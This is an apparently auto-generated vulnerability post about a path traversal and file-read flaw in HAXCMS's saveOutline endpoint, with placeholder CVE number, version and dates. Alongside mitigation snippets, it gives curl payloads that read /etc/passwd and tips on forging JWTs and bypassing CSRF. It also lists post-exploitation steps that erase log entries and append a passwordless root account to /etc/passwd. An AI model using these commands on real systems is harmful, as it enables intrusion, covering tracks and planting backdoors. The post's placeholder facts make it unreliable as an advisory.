HAXCMS, Local File Inclusion (LFI), CVE-2023-XXXX (Critical)

Listen to this Post

How the CVE Works

The vulnerability occurs in HAXCMS when processing the `location` field in the `saveOutline` API endpoint. An authenticated attacker can manipulate this field to inject path traversal sequences (e.g., ../../../etc/passwd). The CMS fails to sanitize this input before writing it to site.json. Later, when the CMS loads the outline data, it resolves the malicious path, leading to arbitrary file read. Since the web server (www-data) typically has read access to system files, attackers can exfiltrate sensitive data.

DailyCVE Form

Platform: HAXCMS
Version: <vX.X.X
Vulnerability: LFI
Severity: Critical
Date: 2023-XX-XX

Prediction: Patch by Q3 2023

What Undercode Say:

Exploitation:

  1. Auth Bypass: If JWT is weak, brute-force or forge tokens.
  2. CSRF Bypass: Use `fetch()` with `credentials: include` to bypass CSRF.

3. Payload Crafting:

curl -X POST 'https://target/system/api/saveOutline' \
-H 'Authorization: Bearer JWT' \
-H 'X-CSRF-Token: XXX' \
-d '{"location":"../../../etc/passwd"}'

4. Exfiltration:

curl 'https://target/?load=../../../../etc/passwd' | grep root

Mitigation:

1. Input Sanitization:

$location = realpath(trim($_POST['location']));
if (strpos($location, BASE_DIR) !== 0) { die("Invalid path"); }

2. Web Server:

location ~ .json$ { deny all; }

3. PHP Hardening:

open_basedir = /var/www/html

4. WAF Rules:

modsecurity_rules 'SecRule ARGS "@contains ../" "id:1000,deny"'

Detection:

grep -r "saveOutline" /var/www/haxcms --include=".php"

Post-Exploit:

1. Log Cleaning:

sed -i '/passwd/d' /var/log/apache2/access.log

2. Persistence:

echo 'malicious::0:0::/:/bin/bash' >> /etc/passwd

References:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top